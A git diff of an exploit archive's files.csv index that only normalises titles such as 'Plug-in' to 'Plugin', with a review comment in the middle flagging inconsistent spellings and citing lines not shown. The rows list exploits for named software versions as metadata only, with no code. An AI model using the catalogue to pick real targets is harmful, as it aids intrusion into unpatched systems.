diff --git a/files.csv b/files.csv
index 962345c71..f60607a87 100755
--- a/files.csv
+++ b/files.csv
@@ -1225,7 +1225,7 @@ id,file,description,date,author,platform,type,port
 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (osx)",2006-02-08,"H D Moore",osx,remote,0
 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0
 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
-1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
+1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (Non Steam) - Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
 1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0
 1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532
@@ -3094,7 +3094,7 @@ id,file,description,date,author,platform,type,port
 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0
 3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability",2007-03-07,Dj7xpl,php,webapps,0
 3429,platforms/windows/local/3429.php,"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",2007-03-07,N/A,windows,local,0
-3430,platforms/windows/dos/3430.html,"Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption",2007-03-08,shinnai,windows,dos,0
+3430,platforms/windows/dos/3430.html,"Adobe Reader plugin AcroPDF.dll 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0
 3431,platforms/windows/local/3431.php,"PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",2007-03-08,rgod,windows,local,0
 3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 - (UDP) Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0
 3433,platforms/windows/dos/3433.html,"Rediff Toolbar ActiveX Control Remote Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0
@@ -3818,7 +3818,7 @@ id,file,description,date,author,platform,type,port
 4170,platforms/windows/remote/4170.html,"Program Checker (sasatl.dll 1.5.0.531) Javascript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0
 4171,platforms/php/webapps/4171.pl,"Mail Machine <= 3.989 - Local File Inclusion Exploit",2007-07-10,"H4 / XPK",php,webapps,0
 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak PoC",2007-07-10,dreyer,linux,local,0
-4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0
+4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0
 4174,platforms/php/webapps/4174.txt,"PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability",2007-07-12,irk4z,php,webapps,0
 4175,platforms/multiple/dos/4175.php,"PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit",2007-07-12,shinnai,multiple,dos,0
 4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) Arbitary Data Write Exploit",2007-07-12,callAX,windows,remote,0
@@ -5047,7 +5047,7 @@ id,file,description,date,author,platform,type,port
 5414,platforms/php/webapps/5414.txt,"Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability",2008-04-08,S@BUN,php,webapps,0
 5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability",2008-04-08,S@BUN,php,webapps,0
 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0
-5417,platforms/php/webapps/5417.htm,"phpBB Add-on Fishing Cat Portal Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0
+5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0
 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0
 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure Vulnerability",2008-04-09,JIKO,php,webapps,0
 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure Vulnerability",2008-04-09,HaCkeR_EgY,php,webapps,0
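Review bot: The canonical spelling this commit introduces is not applied consistently: the new 5417 line writes `Addon`, while the new 8965, 14186, 31640 and 34052 lines write `AddOn`, and the new 25950 and 28639 lines write `PlugIn` where every other rewritten title in this diff uses `Plugin`. Since the evident purpose is to collapse `Plug-in`/`Plug-In`/`Add-on`/`Add-On` into one form each, pick one spelling per term and apply it to all of these lines in the same commit. The unchanged context line 18972 (`IrfanView 4.33 Format PlugIn ...`) in the 16402 hunk suggests more variants remain elsewhere in files.csv, so a full-file search for the old spellings before merging is worth doing.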
@@ -8414,7 +8414,7 @@ id,file,description,date,author,platform,type,port
 8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0
 8920,platforms/php/webapps/8920.txt,"Joomla Component com_vehiclemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0
 8921,platforms/php/webapps/8921.sh,"phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0
-8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln",2009-06-10,"Core Security",windows,remote,0
+8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection Vuln",2009-06-10,"Core Security",windows,remote,0
 8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0
 8924,platforms/php/webapps/8924.txt,"School Data Navigator (page) Local/Remote File Inclusion Vulnerability",2009-06-10,Br0ly,php,webapps,0
 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script (Auth Bypass) Insecure Cookie Handling Vuln",2009-06-10,N@bilX,php,webapps,0
@@ -8456,7 +8456,7 @@ id,file,description,date,author,platform,type,port
 8962,platforms/php/webapps/8962.txt,"phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln",2009-06-15,SirGod,php,webapps,0
 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router Authentication Bypass Vulnerability",2009-06-15,"Tom Neaves",hardware,remote,0
 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router Remote Denial of Service Vulnerability",2009-06-15,"Tom Neaves",hardware,dos,0
-8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player Add-On HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0
+8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0
 8966,platforms/php/webapps/8966.txt,"phportal 1 - (topicler.php id) Remote SQL Injection Vulnerability",2009-06-15,"Mehmet Ince",php,webapps,0
 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Remote XSS Vulnerability",2009-06-15,"ThE g0bL!N",php,webapps,0
 8968,platforms/php/webapps/8968.txt,"Joomla Component com_jumi (fileid) Blind SQL Injection Exploit",2009-06-15,"Chip d3 bi0s",php,webapps,0
@@ -12475,7 +12475,7 @@ id,file,description,date,author,platform,type,port
 14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0
 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
-14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
+14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
 14187,platforms/php/webapps/14187.txt,"Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability",2010-07-03,RoAd_KiLlEr,php,webapps,0
 14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - CSRF Add FTP Account Exploit",2010-07-03,G0D-F4Th3r,php,webapps,0
 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0
@@ -16402,7 +16402,7 @@ id,file,description,date,author,platform,type,port
 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,metasploit,windows,remote,0
 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0
 18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,metasploit,windows,remote,0
-18974,platforms/php/webapps/18974.txt,"vanilla forum tagging plug-in enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0
+18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0
 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0
 18987,platforms/php/webapps/18987.php,"Wordpress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0
 18988,platforms/php/webapps/18988.php,"Wordpress Plugin Marketplace Plugin 1.5.0 - 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0
@@ -19395,11 +19395,11 @@ id,file,description,date,author,platform,type,port
 22135,platforms/linux/remote/22135.c,"TANne 0.6.17 Session Manager SysLog Format String Vulnerability",2003-01-07,"dong-h0un yoU",linux,remote,0
 22136,platforms/windows/remote/22136.txt,"PlatinumFTPServer 1.0.6 Dot-Dot-Slash Directory Traversal Vulnerability",2003-01-07,"Dennis Rand",windows,remote,0
 22137,platforms/cgi/webapps/22137.txt,"FormMail-Clone Cross-Site Scripting Vulnerability",2003-01-09,"Rynho Zeros Web",cgi,webapps,0
-22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plug-in CMD_ARGV Buffer Overflow Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
-22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin Remote Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
-22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plug-in MakeStats Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
-22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin Remote Format String Vulnerability",2003-01-10,greuff,linux,remote,0
-22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client Server Message Format String Vulnerability",2003-01-10,greuff,windows,remote,0
+22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
+22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
+22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
+22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin - Remote Format String Vulnerability",2003-01-10,greuff,linux,remote,0
+22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client - Server Message Format String Vulnerability",2003-01-10,greuff,windows,remote,0
 22143,platforms/linux/remote/22143.txt,"BRS WebWeaver 1.0 1 MKDir Directory Traversal Weakness",2003-01-10,euronymous,linux,remote,0
 22144,platforms/windows/remote/22144.txt,"Xynph FTP Server 1.0 Relative Path Directory Traversal Vulnerability",2003-01-11,"Zero-X www.lobnan.de Team",windows,remote,0
 22145,platforms/multiple/remote/22145.txt,"BitMover BitKeeper 3.0 Daemon Mode Remote Command Execution Vulnerability",2003-01-11,"Maurycy Prodeus ",multiple,remote,0
@@ -20176,10 +20176,10 @@ id,file,description,date,author,platform,type,port
 22963,platforms/cgi/webapps/22963.txt,"Softshoe Parse-file Cross-Site Scripting Vulnerability",2003-07-28,"Bahaa Naamneh",cgi,webapps,0
 22964,platforms/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String Vulnerability",2003-07-28,lucipher,unix,remote,0
 22965,platforms/linux/local/22965.c,"XBlast 2.6.1 HOME Environment Variable Buffer Overflow Vulnerability",2003-07-28,c0wboy,linux,local,0
-22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0
+22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0
 22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0
 22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal Vulnerability",2003-07-21,gr00vy,php,webapps,0
-22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0
+22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0
 22968,platforms/linux/remote/22968.c,"Valve Software Half-Life Server <= 1.1.1.0 & 3.1.1.1c1 &4.1.1.1a - Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote,0
 22917,platforms/windows/remote/22917.txt,"Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability",2003-08-11,aT4r@3wdesign.es,windows,remote,0
 22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow Vulnerability",2003-07-16,kf,unix,dos,0
@@ -20424,7 +20424,7 @@ id,file,description,date,author,platform,type,port
 23195,platforms/asp/webapps/23195.txt,"Alan Ward A-Cart 2.0 MSG Cross-Site Scripting Vulnerability",2003-09-29,G00db0y,asp,webapps,0
 23196,platforms/linux/remote/23196.c,"WebFS 1.x Long Pathname Buffer Overrun Vulnerability",2003-09-29,jsk,linux,remote,0
 23197,platforms/linux/local/23197.c,"Mah-Jong 1.4 MJ-Player Server Flag Local Buffer Overflow Vulnerability",2003-09-29,jsk,linux,local,0
-23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0
+23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0
 23199,platforms/multiple/remote/23199.c,"OpenSSL ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0
 23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 IRC Client Remote Buffer Overflow Vulnerability",2003-09-30,"Luigi Auriemma",linux,dos,0
 23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 - (.swf) Crash PoC",2012-12-07,coolkaveh,windows,dos,0
@@ -20491,12 +20491,12 @@ id,file,description,date,author,platform,type,port
 23262,platforms/jsp/webapps/23262.txt,"Caucho Resin 2.0/2.1 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2003-10-20,"Donnie Werner",jsp,webapps,0
 23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF Malformed Server Name Heap Corruption Vulnerability",2003-10-20,@stake,multiple,dos,0
 23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injection Vulnerabilities",2003-10-20,"Aviram Jenik",php,webapps,0
-23265,platforms/windows/remote/23265.txt,"Sun Java Plug-In 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0
+23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0
 23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart Server Error Message Installation Path Disclosure Vulnerability",2003-10-20,Dr`Ponidi,cgi,webapps,0
 23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur Mailserver 3.3/4.0/4.2 IMAP AUTH Remote Buffer Overflow Vulnerability",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0
 23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting Vulnerability",2003-10-21,ComSec,java,webapps,0
 23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 MyClassifieds Email Variable SQL Injection Vulnerability",2003-10-21,Ezhilan,php,webapps,0
-23270,platforms/windows/remote/23270.java,"Sun Java Plug-In 1.4 Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0
+23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0
 23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin Cross-Site Scripting Vulnerability",2003-10-22,SecuriTeam,multiple,remote,0
 23272,platforms/solaris/remote/23272.txt,"Sun Management Center 3.0/3.5 Error Message Information Disclosure Vulnerability",2003-10-22,"Jon Hart",solaris,remote,0
 23273,platforms/windows/dos/23273.html,"Microsoft Internet Explorer 6.0 Scrollbar-Base-Color Partial Denial of Service Vulnerability",2003-10-22,"Andreas Boeckler",windows,dos,0
@@ -20504,7 +20504,7 @@ id,file,description,date,author,platform,type,port
 23275,platforms/cgi/webapps/23275.txt,"DansGuardian 2.2.x Denied URL Cross-Site Scripting Vulnerability",2003-10-22,"Richard Maudsley",cgi,webapps,0
 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x Slash Path Security Model Circumvention Vulnerability",2003-10-22,"Last Stage of Delirium",multiple,dos,0
 23387,platforms/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal Vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0
-23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0
+23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0
 23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service Vulnerability",2003-11-19,anonymous,openbsd,dos,0
 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0
 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0
@@ -21114,7 +21114,7 @@ id,file,description,date,author,platform,type,port
 23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal Vulnerability",2004-04-05,dr_insane,windows,remote,0
 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Local Privilege Escalation Vulnerability",2004-04-06,"Ian Vitek",windows,local,0
 23911,platforms/windows/dos/23911.txt,"Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
-23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
+23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plugin - Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
 23913,platforms/cgi/webapps/23913.txt,"Floosietek FTGate Mail Server 1.2 index.fts folder Parameter XSS",2004-04-06,dr_insane,cgi,webapps,0
 23914,platforms/cgi/webapps/23914.txt,"Floosietek FTGate Mail Server 1.2 Path Disclosure Vulnerability",2004-04-06,dr_insane,cgi,webapps,0
 23915,platforms/windows/dos/23915.txt,"Adobe Photoshop 8.0 COM Objects Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
@@ -21193,7 +21193,7 @@ id,file,description,date,author,platform,type,port
 23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injection Vulnerabilities",2004-04-13,waraxe,php,webapps,0
 23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0
 24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service Vulnerability",2004-04-14,"Paul Szabo",windows,dos,0
-23993,platforms/php/webapps/23993.txt,"websitebaker add-on concert calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0
+23993,platforms/php/webapps/23993.txt,"Websitebaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0
 23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,"cr4wl3r ",php,webapps,0
 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",hardware,webapps,0
 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - (.jpeg) Exploit",2013-01-09,"Debasish Mandal",windows,local,0
@@ -21576,7 +21576,7 @@ id,file,description,date,author,platform,type,port
 24385,platforms/asp/webapps/24385.txt,"Zixforum ZixForum.mdb Database Disclosure Vulnerability",2004-07-19,"Security .Net Information",asp,webapps,0
 24386,platforms/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow Vulnerability",2004-07-20,"Matthias Bethke",multiple,dos,0
 24387,platforms/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 HTML Injection Vulnerability",2004-08-20,"Audun Larsen",multiple,remote,0
-24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server Info Response Buffer Overflow Vulnerability",2004-08-20,Dimetrius,multiple,dos,0
+24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server - Info Response Buffer Overflow Vulnerability",2004-08-20,Dimetrius,multiple,dos,0
 24389,platforms/php/webapps/24389.txt,"Sympa 4.x New List HTML Injection Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0
 24390,platforms/php/webapps/24390.txt,"Mantis 0.19 - Remote Server-Side Script Execution Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0
 24391,platforms/php/webapps/24391.txt,"Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",php,webapps,0
@@ -21922,7 +21922,7 @@ id,file,description,date,author,platform,type,port
 24760,platforms/hardware/remote/24760.txt,"ZyXEL 3 Prestige Router HTTP Remote Administration Configuration Reset Vulnerability",2004-11-22,"Francisco Canela",hardware,remote,0
 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x Client Remote Denial of Service Vulnerability",2004-11-22,"Luigi Auriemma",multiple,dos,0
 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0
-24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plug-in JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0
+24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0
 24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0
 24766,platforms/php/webapps/24766.txt,"NuKed-Klan 1.x Submit Link Function HTML Injection Vulnerability",2004-11-23,XioNoX,php,webapps,0
 24767,platforms/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Buffer Overflow Vulnerability",2004-11-23,"Luigi Auriemma",windows,remote,0
@@ -22855,7 +22855,7 @@ id,file,description,date,author,platform,type,port
 25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0
 25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
 25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 Insecure File Creation Vulnerability",2005-05-26,"Eric Romang",linux,local,0
-25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plug-in Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
+25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
 25711,platforms/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer Malformed File Name Handling Denial of Service Vulnerability",2005-05-26,"Marek Bialoglowy",hardware,dos,0
 25712,platforms/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE",2013-05-26,rgod,windows,dos,0
 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE",2013-05-26,rgod,windows,remote,0
@@ -23097,7 +23097,7 @@ id,file,description,date,author,platform,type,port
 25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Index.PHP Directory Traversal Vulnerability",2005-07-06,"Diabolic Crab",php,webapps,0
 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0
 25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite Vulnerability",2005-07-06,pi3ki31ny,linux,local,0
-25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 Plug-In Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0
+25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0
 25951,platforms/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",php,webapps,0
 25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 Kaiseki.CGI Remote Command Execution Vulnerability",2005-07-07,blahplok,cgi,webapps,0
 25953,platforms/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0
@@ -25693,7 +25693,7 @@ id,file,description,date,author,platform,type,port
 28636,platforms/php/webapps/28636.txt,"Grayscale BandSite CMS 1.1 shows_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
 28637,platforms/php/webapps/28637.txt,"Grayscale BandSite CMS 1.1 signgbook_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
 28638,platforms/php/webapps/28638.txt,"Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
-28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 Plug-In Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0
+28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0
